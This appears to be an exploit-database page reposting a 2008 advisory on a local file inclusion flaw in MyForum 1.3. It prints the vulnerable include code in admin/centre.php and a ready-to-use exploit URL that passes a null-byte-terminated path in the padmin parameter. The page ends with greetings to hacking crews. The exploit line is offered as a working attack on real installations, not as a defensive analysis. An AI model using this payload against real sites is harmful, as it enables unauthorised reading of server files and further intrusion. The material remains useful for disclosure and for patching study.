MyForum 1.3 (padmin) Local File Inclusion Vulnerability
CVE
Category
Price
Severity
CWE-98
Not specified
Not specified
Author
Risk
Exploitation Type
Date
Not specified
Local
2008-10-31
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008100261 [o]------------------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : MyForum 1.3 |
| Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip | |
| Date : 27 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[»] Vulnerable
./admin/centre.php
3: if (isset($padmin))
4: {
5:
6: $fichier = "padmin/".$padmin.".php";
7:
8: if (file_exists($fichier))
9: {
10: include ($fichier);
11: }
[»] Exploit
http://[site]/[path]/admin/centre.php?padmin=[LFI]%00
[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
| Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, |
| loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, |
| chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! |
[o]------------------------------------------------------------------------------------[o]
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum